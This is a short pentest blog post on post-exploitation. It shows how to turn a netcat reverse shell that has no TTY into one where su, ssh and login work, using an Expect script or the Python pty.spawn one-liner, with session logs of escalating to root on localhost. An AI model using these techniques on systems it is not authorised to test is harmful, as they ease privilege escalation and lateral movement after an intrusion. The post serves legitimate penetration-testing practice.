Post-Exploitation Without A TTY
This is a follow-up to a topic I touched on breifly before when I talked about the problem of trying to use the SSH client when you don’t have a TTY. I was recently in a position where I got an interactive shell on a box, discovered the root password but was unable to get root because I couldn’t run “login” or “su”. Both of these required a TTY in order to work.
I don’t present a definitive solution in this problem (if you have one please sent it in!). However I discuss a couple of approaches to getting a TTY…
Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.
Using “Expect” To Get A TTY
If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.
$ cat sh.exp #!/usr/bin/expect # Spawn a shell, then allow the user to interact with it. # The new shell will have a good enough TTY to run tools like ssh, su and login spawn sh interact
The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:
$ nc -v -n -l -p 1234 listening on [any] 1234 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257 sh: no job control in this shell sh-3.2$ su - su: must be run from a terminal sh-3.2$ expect sh.exp spawn sh sh-3.2$ su - Password: mypassword localhost ~ #
Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):
$ nc -v -n -l -p 1234 listening on [any] 1234 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250 sh: no job control in this shell sh-3.2$ ssh localhost Pseudo-terminal will not be allocated because stdin is not a terminal. <big pause>
$ nc -v -n -l -p 1234 listening on [any] 1234 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252 sh: no job control in this shell sh-3.2$ ssh -T localhost <big pause>
After we run sh.exp we are able to use the ssh client as normal:
$ nc -v -n -l -p 1234 listening on [any] 1234 ... connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498 sh: no job control in this shell sh-3.2$ expect sh.exp spawn sh sh-3.2$ ssh localhost ssh localhost Password: mypassword Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1 user@localhost ~ $
Using Python To Get A TTY
This is quite an elegant solution I found on Tero’s glob. It should be effective against gentoo systems at least because the gentoo package management runs on python.
$ nc -v -n -l -p 1234
listening on [any] 1234 …
sh: no job control in this shell
sh-3.2$ su –
su: must be run from a terminal
sh-3.2$ python -c ‘import pty; pty.spawn(“/bin/sh”)’
sh-3.2$ su –
su –
Password:
localhost ~ #
Using PERL To Get A TTY
This is not such as great solution as IO::Pty isn’t installed by default on any system I’ve seen. For completeness, though:
<hmmm… can’t get it will working. Will post later.>
Leave a Reply
You must be logged in to post a comment.